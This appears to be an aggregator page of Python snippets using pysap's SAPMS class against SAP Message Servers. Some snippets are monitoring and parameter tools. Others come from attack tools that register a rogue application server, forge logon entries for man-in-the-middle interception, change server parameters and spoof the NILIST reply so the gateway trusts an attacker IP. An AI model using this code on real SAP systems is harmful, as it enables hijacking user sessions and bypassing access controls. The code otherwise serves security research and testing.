Python SAPMS Examples

Example #1

File: ms_messager.py Project: sasqwatch/pysap

def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    domain = ms_domain_values_inv[options.domain]

    # Initiate the connection
    conn = SAPRoutedStreamSocket.get_nisocket(options.remote_host,
                                              options.remote_port,
                                              options.route_string,
                                              base_cls=SAPMS)
    print("[*] Connected to the message server %s:%d" % (options.remote_host, options.remote_port))

    client_string = options.client

    # Send MS_LOGIN_2 packet
    p = SAPMS(flag=0x00, iflag=0x08, domain=domain, toname=client_string, fromname=client_string)

    print("[*] Sending login packet")
    response = conn.sr(p)[SAPMS]

    print("[*] Login performed, server string: %s" % response.fromname)

    # Sends a message to another client
    p = SAPMS(flag=0x02, iflag=0x01, domain=domain, toname=options.target, fromname=client_string, opcode=1)
    p /= Raw(options.message)

    print("[*] Sending packet to: %s" % options.target)
    conn.send(p)

Example #2

File: ms_dump_info.py Project: sickwell/pysap

def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    domain = ms_domain_values_inv[options.domain]

    # Initiate the connection
    conn = SAPRoutedStreamSocket.get_nisocket(options.remote_host,
                                              options.remote_port,
                                              options.route_string,
                                              base_cls=SAPMS)
    print("[*] Connected to the message server %s:%d" %
          (options.remote_host, options.remote_port))

    client_string = options.client

    # Send MS_LOGIN_2 packet
    p = SAPMS(flag=0x00,
              iflag=0x08,
              domain=domain,
              toname=client_string,
              fromname=client_string)

    print("[*] Sending login packet:")
    response = conn.sr(p)[SAPMS]

    print("[*] Login OK, Server string: %s" % response.fromname)
    server_string = response.fromname

    # Send a Dump Info packet for each possible Dump
    for i in ms_dump_command_values.keys():

        # Skip MS_DUMP_MSADM and MS_DUMP_COUNTER commands as the info
        # is included in other dump commands
        if i in [1, 12]:
            continue

        p = SAPMS(flag=0x02,
                  iflag=0x01,
                  domain=domain,
                  toname=server_string,
                  fromname=client_string,
                  opcode=0x1e,
                  dump_dest=0x02,
                  dump_command=i)

        print("[*] Sending dump info", ms_dump_command_values[i])
        response = conn.sr(p)[SAPMS]

        if response.opcode_error != 0:
            print("Error:", ms_opcode_error_values[response.opcode_error])
        print(response.opcode_value)

Example #3

File: sap_ms_dispatcher_mitm.py Project: tundeogunkoya/sap_ms

def ms_build_set_logon(ptype, serv_info):
    if ptype == 'diag':
        logon_type = 'MS_LOGON_DIAG'
        port = serv_info['diag_port']
    elif ptype == 'rfc':
        logon_type = 'MS_LOGON_RFC'
        port = serv_info['rfc_port']
    address = serv_info['ip']
    host = serv_info['fqdn']

    p = SAPMS(fromname=my_name,
              toname=msg_server_name,
              flag='MS_REQUEST',
              iflag='MS_SEND_NAME',
              opcode='MS_SET_LOGON',
              logon=SAPMSLogon(type=logon_type,
                               port=port,
                               address=address,
                               logonname_length=0,
                               prot_length=0,
                               host_length=len(host),
                               host=host,
                               misc_length=4,
                               misc='LB=9')) / Raw(load="\xff\xff")
    return p

Example #4

File: sap_ms_dispatcher_mitm.py Project: tundeogunkoya/sap_ms

def ms_get_server_list(s, key):
    as_list_d = dict()
    p = SAPMS(fromname=my_name,
              toname=msg_server_name,
              key=key,
              flag='MS_REQUEST',
              opcode='MS_SERVER_LST',
              opcode_error='MSOP_OK',
              opcode_version=104,
              opcode_charset=3)

    r = s.sr(p)

    if not r.clients:
        logger.error("[!] Answer doesn't contain server list.")
        #s.close()
        return as_list_d  # dict()

    handle_answer(s, r)
    for c in r.clients:
        as_list_d[c.client.strip()] = {
            "host": c.host.strip(),
            "ip": c.hostaddrv4,
            "port": c.servno,
            "type": c.sprintf('%SAPMSClient4.msgtype%'),
            "status": ms_client_status_values[c.status]
        }
    return as_list_d

Example #5

File: ms_monitor.py Project: HPxpat/pysap

    def do_connect(self, args):
        """ Initiate the connection to the Message Server service. The
        connection is registered using the client_string runtime option. """

        # Create the socket connection
        try:
            self.connection = SAPRoutedStreamSocket.get_nisocket(self.options.remote_host,
                                                                 self.options.remote_port,
                                                                 self.options.route_string,
                                                                 base_cls=SAPMS)
        except SocketError as e:
            self._error("Error connecting with the Message Server")
            self._error(str(e))
            return

        self._print("Attached to %s / %d" % (self.options.remote_host, self.options.remote_port))

        # Send MS_LOGIN_2 packet
        p = SAPMS(flag=0x00, iflag=0x08, toname=self.runtimeoptions["client_string"], fromname=self.runtimeoptions["client_string"])

        self._debug("Sending login packet")
        response = self.connection.sr(p)[SAPMS]

        if response.errorno == 0:
            self.runtimeoptions["server_string"] = response.fromname
            self._debug("Login performed, server string: %s" % response.fromname)
            self._print("pysap's Message Server monitor, connected to %s / %d" % (self.options.remote_host, self.options.remote_port))
            self.connected = True
        else:
            if response.errorno in ms_errorno_values:
                self._error("Error performing login: %s" % ms_errorno_values[response.errorno])
            else:
                self._error("Unknown error performing login: %d" % response.errorno)

Example #6

 def _build(self, flag, iflag, **args):
     return SAPMS(
         flag=flag,
         iflag=iflag,
         toname=self.runtimeoptions["server_string"],
         fromname=self.runtimeoptions["client_string"],
         domain=ms_domain_values_inv[self.runtimeoptions["domain"]],
         **args)

Example #7

File: sap_ms_dispatcher_mitm.py Project: tundeogunkoya/sap_ms

def ms_buld_prop_set_release(release='745', patchno='15'):
    return SAPMS(toname=msg_server_name,
                 flag='MS_REQUEST',
                 fromname=my_name,
                 opcode='MS_SET_PROPERTY',
                 opcode_charset=0,
                 property=SAPMSProperty(id='Release information',
                                        release=release,
                                        patchno=int(patchno),
                                        platform=390))

Example #8

File: sap_ms_dispatcher_mitm.py Project: tundeogunkoya/sap_ms

def ms_build_del_logon_by_type(type):
    return SAPMS(toname=msg_server_name,
                 fromname=my_name,
                 flag='MS_REQUEST',
                 iflag='MS_SEND_NAME',
                 opcode='MS_DEL_LOGON',
                 logon=SAPMSLogon(type=type,
                                  logonname_length=0,
                                  prot_length=0,
                                  host_length=0,
                                  misc_length=0,
                                  address6_length=65535))

Example #9

File: ms_listener.py Project: okuuva/pysap

def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    domain = ms_domain_values_inv[options.domain]

    # Initiate the connection
    conn = SAPRoutedStreamSocket.get_nisocket(options.remote_host,
                                              options.remote_port,
                                              options.route_string,
                                              base_cls=SAPMS)
    print("[*] Connected to the message server %s:%d" %
          (options.remote_host, options.remote_port))

    client_string = options.client

    # Send MS_LOGIN_2 packet
    p = SAPMS(flag=0x00,
              iflag=0x08,
              domain=domain,
              toname=client_string,
              fromname=client_string)

    print("[*] Sending login packet")
    response = conn.sr(p)[SAPMS]

    print("[*] Login performed, server string: %s" % response.fromname)

    print("[*] Listening to server messages")
    try:
        while (True):
            # Send MS_SERVER_LST packet
            response = conn.recv()[SAPMS]

            print("[*] Message received !")
            response.show()

    except SocketError:
        print("[*] Connection error")
    except KeyboardInterrupt:
        print("[*] Cancelled by the user")

Example #10

File: ms_dump_param.py Project: supersache/pysap

def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    # initiate the connection :
    print("[*] Initiate connection to message server %s:%d" %
          (options.remote_host, options.remote_port))
    try:
        conn = SAPRoutedStreamSocket.get_nisocket(options.remote_host,
                                                  options.remote_port,
                                                  options.route_string,
                                                  base_cls=SAPMS)
    except Exception as e:
        print(e)
        print(
            "Error during MS connection. Is internal ms port %d reachable ?" %
            options.remote_port)
    else:
        print("[*] Connected. I check parameters...")
        client_string = options.client
        # Send MS_LOGIN_2 packet
        p = SAPMS(flag=0x00,
                  iflag=0x08,
                  toname=client_string,
                  fromname=client_string)
        print("[*] Sending login packet:")
        response = conn.sr(p)[SAPMS]
        print("[*] Login OK, Server string: %s\n" % response.fromname)
        server_string = response.fromname

        try:
            with open(options.file_param) as list_param:
                for line in list_param.readlines():
                    line = line.strip()

                    # Check for comments or empty lines
                    if len(line) == 0 or line.startswith("#"):
                        continue

                    # Get parameters, check type and expected value
                    # param2c = the SAP parameter to check
                    # check_type = EQUAL, SUP, INF, REGEX, <none>
                    # value2c = the expect value for 'ok' status
                    (param2c, check_type, value2c) = line.split(':')
                    status = '[!]'

                    # create request
                    adm = SAPMSAdmRecord(opcode=0x1, parameter=param2c)
                    p = SAPMS(toname=server_string,
                              fromname=client_string,
                              version=4,
                              flag=0x04,
                              iflag=0x05,
                              adm_records=[adm])

                    # send request
                    respond = conn.sr(p)[SAPMS]
                    value = respond.adm_records[0].parameter.replace(
                        respond.adm_records[0].parameter.split('=')[0] + '=',
                        '')

                    # Verify if value match with expected value
                    if value == '':
                        value = 'NOT_EXIST'
                        status = '[ ]'
                    elif check_type == 'EQUAL':
                        if value.upper() == str(value2c).upper():
                            status = '[+]'
                    elif check_type == 'NOTEQUAL':
                        if value.upper() != str(value2c).upper():
                            status = '[+]'
                    elif check_type == 'REGEX':
                        if re.match(value2c.upper(),
                                    value.upper()) and value2c != 'NOT_EXIST':
                            status = '[+]'
                    elif check_type == 'SUP':
                        if float(value) >= float(value2c):
                            status = '[+]'
                    elif check_type == 'INF':
                        if float(value) <= float(value2c):
                            status = '[+]'
                    else:
                        status = '[ ]'

                    # display result
                    print("%s %s = %s" % (status, param2c, value))

        except IOError:
            print("Error reading parameters file !")
            exit(0)
        except ValueError:
            print("Invalid parameters file format or access denied!")
            exit(0)

Example #11

File: ms_observer.py Project: pyq881120/pysap

def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    # Initiate the connection
    conn = SAPRoutedStreamSocket.get_nisocket(options.remote_host,
                                              options.remote_port,
                                              options.route_string,
                                              base_cls=SAPMS)
    print("[*] Connected to the message server %s:%d" %
          (options.remote_host, options.remote_port))

    # Generate a random client string to differentiate our connection
    client_string = options.client

    # Send MS_LOGIN_2 packet
    print("[*] Sending login packet")
    p = SAPMS(flag=0x00,
              iflag=0x08,
              toname=client_string,
              fromname=client_string)
    response = conn.sr(p)[SAPMS]

    print("[*] Login performed, server string: %s" % response.fromname)
    server_string = response.fromname

    # Send MS_SERVER_CHG packet
    print("[*] Sending server change packet")
    p = SAPMS(flag=0x02,
              iflag=0x01,
              toname=server_string,
              fromname=client_string,
              opcode=0x01,
              opcode_version=4)
    response = conn.sr(p)[SAPMS]

    # Send MS_SERVER_LONG_LIST packet
    print("[*] Sending server long list packet")
    p = SAPMS(flag=0x01,
              iflag=0x01,
              toname=server_string,
              fromname=client_string,
              opcode=0x40,
              opcode_charset=0x00)
    conn.send(p)

    clients = []

    def print_client(msg, client):
        if options.verbose:
            print("[*] %s %s (host=%s, service=%s, port=%d)" %
                  (msg, client.client.strip(), client.host.strip(),
                   client.service.strip(), client.servno))

    # Send MS_SERVER_LST packet
    print("[*] Retrieving list of current clients")
    p = SAPMS(flag=0x02,
              iflag=0x01,
              toname=server_string,
              fromname=client_string,
              opcode=0x05,
              opcode_version=0x68)
    response = conn.sr(p)[SAPMS]
    for client in response.clients:
        if client.client != client_string:
            clients.append(("LIST", client))
            print_client("Client", client)

    try:
        while (True):
            response = conn.recv()[SAPMS]

            response.show()
            if response.opcode == 0x02:  # Added client
                client = response.clients[0]
                clients.append(("ADD", client))
                print_client("Added client", client)
            elif response.opcode == 0x03:  # Deleted client
                client = response.clients[0]
                clients.append(("DEL", client))
                print_client("Deleted client", client)
            elif response.opcode == 0x04:  # Modified client
                client = response.clients[0]
                clients.append(("MOD", client))
                print_client("Modified client", client)

    except SocketError:
        print("[*] Connection error")
    except KeyboardInterrupt:
        print("[*] Cancelled by the user")

    finally:
        print("[*] Observed clients:")
        for action, client in clients:
            print("\t%s\tclient %s (host=%s, service=%s, port=%d)" %
                  (action, client.client.strip(), client.host.strip(),
                   client.service.strip(), client.servno))

Example #12

File: sap_ms_betrusted.py Project: gpaliot-eurosec/sap_ms

    "msport": 3901,
    "sid": "DEV",
    "instance": "00",
    "release": "745",
    "patchno": "15"
}

my_name = gen_ms_servername(fake_as["host"], attacked_as["sid"],
                            attacked_as["instance"])
anon_name = '-' + ' ' * 39

msg_server_name = 'MSG_SERVER'  # \x00MsgServer\x00FN_CHECK\x00FN_TP\x00tp$('
null_key = "\x00" * 8

p_logout = SAPMS(toname=anon_name,
                 fromname=anon_name,
                 flag=0,
                 iflag='MS_LOGOUT')

p_login_anon = SAPMS(toname=anon_name,
                     fromname=anon_name,
                     flag=0,
                     iflag='MS_LOGIN_2')

p_login_diag = SAPMS(toname=anon_name,
                     fromname=my_name,
                     msgtype='DIA+UPD+BTC+SPO+UP2+ICM',
                     flag=0,
                     iflag='MS_LOGIN_2',
                     diag_port=fake_as['diag_port'])

p_login_rfc = SAPMS(toname=anon_name,

Example #13

File: sap_ms_dispatcher_mitm.py Project: tundeogunkoya/sap_ms

    "sid": "CIA",
    "instance": "00",
    "iface": None,
    "release": "745",
    "patchno": "15"
}

my_name = gen_ms_servername(fake_as["host"], attacked_as["sid"],
                            attacked_as["instance"])
#attacked_name = gen_ms_servername(attacked_as["host"], attacked_as["sid"], attacked_as["instance"])
anon_name = '-' + ' ' * 39
msg_server_name = 'MSG_SERVER'  # \x00MsgServer\x00FN_CHECK\x00FN_TP\x00tp$('
null_key = "\x00" * 8

p_logout = SAPMS(toname=anon_name,
                 fromname=anon_name,
                 flag=0,
                 iflag='MS_LOGOUT')

p_login_anon = SAPMS(toname=anon_name,
                     fromname=anon_name,
                     flag=0,
                     iflag='MS_LOGIN_2')

p_login_diag = SAPMS(toname=anon_name,
                     fromname=my_name,
                     msgtype='DIA+UPD+BTC+SPO+UP2+ICM',
                     flag=0,
                     iflag='MS_LOGIN_2',
                     diag_port=fake_as['diag_port'])

p_login_rfc = SAPMS(toname=anon_name,

Example #14

attacked_as = {
    "ip": "172.16.100.50",
    "host": "sap-abap-01",
    "msport": 3901,
    "sid": "DEV",
    "instance": "00"
}

my_name = gen_ms_servername(fake_as["host"], attacked_as["sid"],
                            attacked_as["instance"])
anon_name = '-' + ' ' * 39
null_key = "\x00" * 8

p_login_anon = SAPMS(toname=anon_name,
                     fromname=anon_name,
                     flag=0,
                     iflag='MS_LOGIN_2',
                     padd=0)

p_logout = SAPMS(toname=anon_name,
                 fromname=anon_name,
                 flag=0,
                 iflag='MS_LOGOUT',
                 padd=0)

p_adm_readall_i = SAPMS(fromname=my_name,
                        toname=anon_name,
                        flag='MS_ADMIN',
                        iflag='MS_ADM_OPCODES',
                        key=null_key,
                        adm_recno=1,

Example #15

File: sap_ms_betrusted.py Project: gpaliot-eurosec/sap_ms

def ms_adm_nilist(p, whos_asking):
    print "[+] " + yellow(
        "Generating AD_GET_NILIST_PORT answer for request with key",
        bold=True) + " '%s'" % p.key.encode('hex')
    fromname = str()
    toname = str()
    answer = 1

    # extract info from key
    foo, key_t, key_u, key_respid = struct.unpack('!BBHL', p.key)

    fromname = my_name
    toname = p.fromname

    key = p.key
    flag = 'MS_REPLY'
    opcode_version = 5
    adm_type = 'ADM_REPLY'
    rec = ' ' * 100
    recno = 0
    records = None

    r = SAPMS(toname=toname,
              fromname=fromname,
              key=key,
              domain='ABAP',
              flag=flag,
              iflag='MS_SEND_NAME',
              opcode='MS_DP_ADM',
              opcode_version=p.opcode_version,
              opcode_charset=p.opcode_charset,
              dp_version=p.dp_version,
              adm_recno=recno,
              adm_type=adm_type,
              adm_records=records)

    ###############################
    # 745 KERNEL and sometime 742 #
    ###############################
    # why "sometime" for 742?
    # they have both programs, old "RSMONGWY_SEND_NILIST" and new "RGWMON_SEND_NILIST"
    # they both use dp_version=13, but IP list format expected in the ADM layer is a
    # bit different between both programs.
    if p.dp_version == 13:
        r.adm_recno = 4
        if 'RSMONGWY_SEND_NILIST' in whos_asking:
            r.adm_records = [
                SAPMSAdmRecord(opcode='AD_SELFIDENT',
                               record=rec,
                               serial_number=0,
                               executed=answer),
                SAPMSAdmRecord(opcode='AD_GET_NILIST',
                               record=ms_adm_build_old_ip_record("127.0.0.1"),
                               serial_number=0,
                               executed=answer),
                SAPMSAdmRecord(opcode='AD_GET_NILIST',
                               record=ms_adm_build_old_ip_record("127.0.0.2"),
                               serial_number=1,
                               executed=answer),
                SAPMSAdmRecord(opcode='AD_GET_NILIST',
                               record=ms_adm_build_old_ip_record(
                                   fake_as["ip"]),
                               serial_number=2,
                               executed=answer)
            ]
        else:
            r.adm_records = [
                SAPMSAdmRecord(opcode='AD_SELFIDENT',
                               record=rec,
                               serial_number=0,
                               executed=answer),
                SAPMSAdmRecord(opcode='AD_GET_NILIST_PORT',
                               record=ms_adm_build_ip_record("127.0.0.1"),
                               serial_number=0,
                               executed=answer),
                SAPMSAdmRecord(opcode='AD_GET_NILIST_PORT',
                               record=ms_adm_build_ip_record("127.0.0.2"),
                               serial_number=1,
                               executed=answer),
                SAPMSAdmRecord(opcode='AD_GET_NILIST_PORT',
                               record=ms_adm_build_ip_record(fake_as["ip"]),
                               serial_number=2,
                               executed=answer)
            ]
        r.dp_info1 = SAPDPInfo1(
            dp_req_len=452,
            dp_req_prio='MEDIUM',
            dp_type_from='BY_NAME',
            dp_fromname=my_name,
            dp_agent_type_from='DISP',
            dp_worker_from_num=p.dp_info1.dp_worker_to_num,
            dp_addr_from_t=p.dp_info1.dp_addr_from_t,
            dp_addr_from_u=p.dp_info1.dp_addr_from_u,
            dp_addr_from_m=0,
            dp_respid_from=p.dp_info1.dp_respid_from,
            dp_type_to='BY_NAME',
            dp_toname=p.fromname,
            dp_agent_type_to='WORKER',
            dp_worker_type_to='DIA',
            dp_worker_to_num=p.dp_info1.dp_worker_from_num,
            dp_addr_to_t=p.dp_info1.dp_addr_from_t,
            dp_addr_to_u=p.dp_info1.dp_addr_from_u,
            dp_addr_to_m=p.dp_info1.dp_addr_from_m,
            dp_respid_to=p.dp_info1.dp_respid_from,
            dp_req_handler='REQ_HANDLER_ADM_RESP',
            dp_blob_worker_from_num=p.dp_info1.dp_worker_from_num,
            dp_blob_addr_from_t=p.dp_info1.dp_addr_from_t,
            dp_blob_addr_from_u=p.dp_info1.dp_addr_from_u,
            dp_blob_respid_from=p.dp_info1.dp_blob_respid_from,
            dp_blob_dst=(' ' * 35).encode('UTF-16-BE'))

    ##############
    # 720 KERNEL #
    ##############
    # Here we use old IP list format
    # and a much simpler DP layer
    if p.dp_version == 11:
        r.adm_recno = 4
        r.adm_records = [
            SAPMSAdmRecord(opcode='AD_SELFIDENT',
                           record=rec,
                           serial_number=0,
                           executed=answer),
            SAPMSAdmRecord(opcode='AD_GET_NILIST',
                           record=ms_adm_build_old_ip_record("127.0.0.1"),
                           serial_number=0,
                           executed=answer),
            SAPMSAdmRecord(opcode='AD_GET_NILIST',
                           record=ms_adm_build_old_ip_record("127.0.0.2"),
                           serial_number=1,
                           executed=answer),
            SAPMSAdmRecord(opcode='AD_GET_NILIST',
                           record=ms_adm_build_old_ip_record(fake_as["ip"]),
                           serial_number=2,
                           executed=answer)
        ]

        r.dp_info2 = SAPDPInfo2(dp_req_prio='MEDIUM',
                                dp_blob_14=p.dp_info2.dp_blob_14,
                                dp_name_to=p.fromname,
                                dp_addr_from_t=255,
                                dp_blob_09='\xff\xcc',
                                dp_blob_10='\x01\x00',
                                dp_addr_from_u=0,
                                dp_addr_from_m=0,
                                dp_addr_to_t=key_t,
                                dp_addr_to_u=key_u,
                                dp_addr_to_m=0,
                                dp_respid_to=key_respid,
                                dp_blob_19=1,
                                dp_blob_21=105)
    ##############
    # 749 KERNEL #
    ##############
    # That's use on latest kernel like S4HANA servers
    if p.dp_version == 14:
        r.adm_recno = 4
        r.adm_records = [
            SAPMSAdmRecord(opcode='AD_SELFIDENT',
                           record=rec,
                           serial_number=0,
                           executed=answer),
            SAPMSAdmRecord(opcode='AD_GET_NILIST_PORT',
                           record=ms_adm_build_ip_record("127.0.0.1"),
                           serial_number=0,
                           executed=answer),
            SAPMSAdmRecord(opcode='AD_GET_NILIST_PORT',
                           record=ms_adm_build_ip_record("127.0.0.2"),
                           serial_number=1,
                           executed=answer),
            SAPMSAdmRecord(opcode='AD_GET_NILIST_PORT',
                           record=ms_adm_build_ip_record(fake_as["ip"]),
                           serial_number=2,
                           executed=answer)
        ]
        r.dp_info3 = SAPDPInfo3(dp_req_len=348,
                                dp_req_prio='MEDIUM',
                                dp_type_from='BY_NAME',
                                dp_fromname=my_name,
                                dp_agent_type_from='DISP',
                                dp_worker_from_num=p.dp_info3.dp_worker_to_num,
                                dp_addr_from_t=p.dp_info3.dp_addr_from_t,
                                dp_addr_from_u=p.dp_info3.dp_addr_from_u,
                                dp_addr_from_m=0,
                                dp_respid_from=p.dp_info3.dp_respid_from,
                                dp_type_to='BY_NAME',
                                dp_toname=p.fromname,
                                dp_agent_type_to='WORKER',
                                dp_worker_type_to='DIA',
                                dp_worker_to_num=p.dp_info3.dp_worker_from_num,
                                dp_addr_to_t=p.dp_info3.dp_addr_from_t,
                                dp_addr_to_u=p.dp_info3.dp_addr_from_u,
                                dp_respid_to=p.dp_info3.dp_respid_from,
                                dp_padd25=1,
                                dp_req_handler='REQ_HANDLER_ADM_RESP',
                                dp_padd29=p.dp_info3.dp_padd29,
                                dp_padd30=p.dp_info3.dp_padd30,
                                dp_padd31=p.dp_info3.dp_padd31,
                                dp_padd32=p.dp_info3.dp_padd32)
    open("/tmp/dp.bin", "wb").write(str(SAPNI() / r))
    return r

Example #16

def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    # Initiate the connection
    conn = SAPRoutedStreamSocket.get_nisocket(options.remote_host,
                                              options.remote_port,
                                              options.route_string,
                                              base_cls=SAPMS)
    print("[*] Connected to the message server %s:%d" %
          (options.remote_host, options.remote_port))

    # Set release information
    prop = SAPMSProperty(id=7,
                         release="720",
                         patchno=70,
                         supplvl=0,
                         platform=0)
    p = SAPMS(flag=0x01,
              iflag=0x01,
              toname="MSG_SERVER",
              fromname=options.client,
              opcode=0x43,
              property=prop)
    print("[*] Setting release information")
    conn.send(p)

    # Perform the login enabling the DIA+BTC+ICM services
    p = SAPMS(flag=0x08,
              iflag=0x08,
              msgtype=0x89,
              toname="-",
              fromname=options.client)
    print("[*] Sending login packet")
    conn.sr(p)[SAPMS]
    print("[*] Login performed")

    # Changing the status to starting
    p = SAPMS(flag=0x01,
              iflag=0x09,
              msgtype=0x05,
              toname="-",
              fromname=options.client)
    print("[*] Changing server's status to starting")
    conn.send(p)

    # Set IP address
    p = SAPMS(flag=0x01,
              iflag=0x01,
              toname="MSG_SERVER",
              fromname=options.client,
              opcode=0x06,
              opcode_version=0x01,
              change_ip_addressv4=options.logon_address)
    print("[*] Setting IP address")
    response = conn.sr(p)[SAPMS]
    print("[*] IP address set")
    response.show()

    # Set logon information
    l = SAPMSLogon(type=2,
                   port=3200,
                   address=options.logon_address,
                   host=options.client,
                   misc="LB=3")
    p = SAPMS(flag=0x01,
              iflag=0x01,
              msgtype=0x01,
              toname="MSG_SERVER",
              fromname=options.client,
              opcode=0x2b,
              logon=l)
    print("[*] Setting logon information")
    response = conn.sr(p)[SAPMS]
    print("[*] Logon information set")
    response.show()

    # Set the IP Address property
    prop = SAPMSProperty(client=options.client,
                         id=0x03,
                         address=options.logon_address)
    p = SAPMS(flag=0x02,
              iflag=0x01,
              toname="-",
              fromname=options.client,
              opcode=0x43,
              property=prop)
    print("[*] Setting IP address property")
    response = conn.sr(p)[SAPMS]
    print("[*] IP Address property set")
    response.show()

    # Changing the status to active
    p = SAPMS(flag=0x01,
              iflag=0x09,
              msgtype=0x01,
              toname="-",
              fromname=options.client)
    print("[*] Changing server's status to active")
    conn.send(p)

    # Wait for connections
    try:
        while True:
            response = conn.recv()[SAPMS]
            response.show()

    except KeyboardInterrupt:
        print("[*] Cancelled by the user !")

    # Send MS_LOGOUT packet
    p = SAPMS(flag=0x00,
              iflag=0x04,
              toname="MSG_SERVER",
              fromname=options.client)
    print("[*] Sending logout packet")
    conn.send(p)

Example #17

File: ms_change_param.py Project: supersache/pysap

def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    domain = ms_domain_values_inv[options.domain]

    # Initiate the connection
    conn = SAPRoutedStreamSocket.get_nisocket(options.remote_host,
                                              options.remote_port,
                                              options.route_string,
                                              base_cls=SAPMS)
    print("[*] Connected to the message server %s:%d" % (options.remote_host, options.remote_port))

    client_string = options.client

    # Build MS_LOGIN_2 packet
    p = SAPMS(flag=0x00, iflag=0x08, domain=domain, toname=client_string, fromname=client_string)

    # Send MS_LOGIN_2 packet
    print("[*] Sending login packet")
    response = conn.sr(p)[SAPMS]

    print("[*] Login performed, server string: %s" % response.fromname)
    server_string = response.fromname

    print("[*] Retrieving current value of parameter: %s" % options.param_name)

    # Send ADM AD_PROFILE request
    adm = SAPMSAdmRecord(opcode=0x1, parameter=options.param_name)
    p = SAPMS(toname=server_string, fromname=client_string, version=4,
              flag=0x04, iflag=0x05, domain=domain, adm_records=[adm])

    print("[*] Sending packet")
    response = conn.sr(p)[SAPMS]

    if options.verbose:
        print("[*] Response:")
        response.show()

    param_old_value = response.adm_records[0].parameter
    print("[*] Parameter %s" % param_old_value)

    # If a parameter change was requested, send an ADM AD_SHARED_PARAMETER request
    if options.param_value:
        print("[*] Changing parameter value from: %s to: %s" % (param_old_value,
                                                                options.param_value))

        # Build the packet
        adm = SAPMSAdmRecord(opcode=0x2e,
                             parameter="%s=%s" % (options.param_name,
                                                  options.param_value))
        p = SAPMS(toname=server_string, fromname=client_string, version=4,
                  iflag=5, flag=4, domain=domain, adm_records=[adm])

        # Send the packet
        print("[*] Sending packet")
        response = conn.sr(p)[SAPMS]

        if options.verbose:
            print("[*] Response:")
            response.show()

        if response.adm_records[0].errorno != 0:
            print("[*] Error requesting parameter change (error number %d)" % response.adm_records[0].errorno)
        else:
            print("[*] Parameter changed for the current session !")

Example #18

File: ms_monitor.py Project: vah13/pysap

 def _build(self, flag, iflag, **args):
     return SAPMS(flag=flag,
                  iflag=iflag,
                  toname=self.runtimeoptions["server_string"],
                  fromname=self.runtimeoptions["client_string"],
                  **args)